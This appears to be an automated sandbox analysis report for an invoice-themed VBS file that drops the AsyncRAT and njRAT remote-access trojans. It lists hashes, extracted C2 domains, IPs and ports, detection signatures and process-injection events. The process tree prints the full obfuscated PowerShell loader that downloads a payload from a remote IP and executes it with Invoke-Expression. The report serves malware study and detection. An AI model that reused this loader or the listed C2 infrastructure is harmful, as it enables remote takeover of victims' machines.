asyncrat | d8254110ac2d8ee1e35d89881116ae44e2542adab4b91cfbba532baa180442d9

General

Target

N00FX02Invoicecopy.vbs
Size

5KB
MD5

9e0bd0f4ce191d98589957b4427cf41c
SHA1

00f0cd6cbd74f0be67c4a5ccae6c5bccba40ca28
SHA256

d8254110ac2d8ee1e35d89881116ae44e2542adab4b91cfbba532baa180442d9
SHA512

20863c334593b5e2b476b6e548ced2c9755609be58e433028d2b4bbdb3236266d8cca9afe131ed163b753a5ea79ff581e75a3e205fc20275c513d4f8119221dd

Score

10^/10

asyncrat njrat default hacked rat suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://52.188.147.221/Spreading/HS.txt

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

C2

jilldoggyy.duckdns.org:7840

jilldoggyy.duckdns.org:7829

jilldoggyy.duckdns.org:7841

103.147.185.192:7840

103.147.185.192:7829

103.147.185.192:7841

Mutex

AsyncMutex_6SI8OkPnk

Attributes

anti_vm
false
bsod
false
delay
3
install
false
install_folder
%AppData%
pastebin_config
null

aes.plain

Extracted

Family

njrat

Version

v4.0

Botnet

HacKed

C2

20.194.35.6:8023

Mutex

Windows

Attributes

reg_key
Windows
splitter
|-F-|

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/776-3449-0x000000000040C77E-mapping.dmp	asyncrat
behavioral2/memory/776-3448-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 3928 powershell.exe
8 3928 powershell.exe

flow	pid	process
7	3928	powershell.exe
8	3928	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 3928 set thread context of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 set thread context of 3272	3928	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3928 powershell.exe
3928 powershell.exe
3928 powershell.exe

pid	process
3928	powershell.exe
3928	powershell.exe
3928	powershell.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

Processes:

powershell.exeaspnet_compiler.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	3928	powershell.exe
Token: SeDebugPrivilege	776	aspnet_compiler.exe
Token: SeDebugPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe
Token: 33	3272	aspnet_compiler.exe
Token: SeIncBasePriorityPrivilege	3272	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 3976 wrote to memory of 3928	3976	WScript.exe	powershell.exe
PID 3976 wrote to memory of 3928	3976	WScript.exe	powershell.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 776	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe
PID 3928 wrote to memory of 3272	3928	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\N00FX02Invoicecopy.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://52XXX188XXX147XXX221/Spreading/HSXXXtxt'.Replace('XXX','.');$SOS='2^===H===^5===H===^^===H===52===H===^`===H===^7===H===^8===H===^e===H===^a===H===^d===H===^b===H===^^===H===^5===H===^`===H===^7===H===^8===H===^a===H===20===H===3d===H===20===H===27===H===`e===H===^5===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===^5===H===`2===H===^3===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===5^===H===27===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===27===H===2c===H===27===H===7^===H===2e===H===57===H===27===H===29===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===2b===H===27===H===2c===H===27===H===`c===H===^9===H===^5===H===^e===H===27===H===29===H===3b===H===0a===H===2^===H===53===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^e===H===^a===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^a===H===^b===H===20===H===3d===H===20===H===27===H===^^===H===^f===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===`1===H===^^===H===53===H===5^===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===^7===H===27===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===2a===H===27===H===2c===H===27===H===57===H===`e===H===^c===H===`f===H===27===H===29===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===27===H===2c===H===27===H===72===H===^9===H===`e===H===27===H===29===H===3b===H===0a===H===2^===H===53===H===57===H===58===H===^^===H===^5===H===^3===H===52===H===^`===H===^7===H===59===H===^8===H===55===H===^a===H===^9===H===53===H===^^===H===^`===H===5`===H===^7===H===^8===H===^a===H===20===H===3d===H===27===H===^9===H===`0===H===^5===H===58===H===28===H===`e===H===`0===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===`0===H===`3===H===`0===H===5^===H===20===H===2^===H===^5===H===^^===H===52===H===^`===H===^7===H===^8===H===^e===H===^a===H===^d===H===^b===H===^^===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===^7===H===^2===H===^8===H===^e===H===^a===H===53===H===^^===H===^`===H===^7===H===^8===H===29===H===27===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===2d===H===27===H===2c===H===27===H===`5===H===`0===H===57===H===`0===H===2d===H===^f===H===`2===H===`a===H===`0===H===^5===H===27===H===29===H===2e===H===52===H===`5===H===70===H===`c===H===`1===H===`3===H===`5===H===28===H===27===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3c===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===3e===H===27===H===2c===H===27===H===^5===H===^`===H===^7===H===^8===H===^a===H===29===H===2e===H===2^===H===53===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^e===H===^a===H===58===H===^^===H===^3===H===^`===H===5`===H===^7===H===^2===H===^8===H===^a===H===^b===H===28===H===2^===H===53===H===5a===H===58===H===^^===H===^3===H===^`===H===5`===H===27===H===29===H===3b===H===0a===H===2`===H===28===H===27===H===^9===H===27===H===2b===H===27===H===^5===H===58===H===27===H===29===H===28===H===2^===H===53===H===57===H===58===H===^^===H===^5===H===^3===H===52===H===^`===H===^7===H===59===H===^8===H===55===H===^a===H===^9===H===53===H===^^===H===^`===H===5`===H===^7===H===^8===H===^a===H===20===H===2d===H===^a===H===`f===H===`9===H===`e===H===20===H===27===H===27===H===29===H===7c===H===2`===H===28===H===27===H===^9===H===27===H===2b===H===27===H===^5===H===58===H===27===H===29===H===3b'.Replace('^','4').Replace('`','6');Invoke-Expression (-join ($SOS -split '===' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/776-3449-0x000000000040C77E-mapping.dmp

Download
memory/776-3464-0x0000000006060000-0x0000000006061000-memory.dmp

Filesize
4KB

Download
memory/776-3461-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/776-3448-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3272-3459-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

Filesize
4KB

Download
memory/3272-3455-0x000000000040836E-mapping.dmp

Download
memory/3272-3467-0x0000000005570000-0x0000000005571000-memory.dmp

Filesize
4KB

Download
memory/3272-3466-0x0000000005650000-0x0000000005651000-memory.dmp

Filesize
4KB

Download
memory/3272-3465-0x00000000055A0000-0x00000000055A1000-memory.dmp

Filesize
4KB

Download
memory/3272-3460-0x0000000005AB0000-0x0000000005AB1000-memory.dmp

Filesize
4KB

Download
memory/3272-3454-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3928-125-0x0000019BD0E30000-0x0000019BD0E31000-memory.dmp

Filesize
4KB

Download
memory/3928-115-0x0000000000000000-mapping.dmp

Download
memory/3928-123-0x0000019BD0D23000-0x0000019BD0D25000-memory.dmp

Filesize
8KB

Download
memory/3928-122-0x0000019BD0D20000-0x0000019BD0D22000-memory.dmp

Filesize
8KB

Download
memory/3928-120-0x0000019BB8770000-0x0000019BB8771000-memory.dmp

Filesize
4KB

Download
memory/3928-252-0x0000019BD0D26000-0x0000019BD0D28000-memory.dmp

Filesize
8KB

Download
memory/3928-3447-0x0000019BB87C0000-0x0000019BB87C4000-memory.dmp

Filesize
16KB

Download
memory/3928-253-0x0000019BD0D28000-0x0000019BD0D29000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads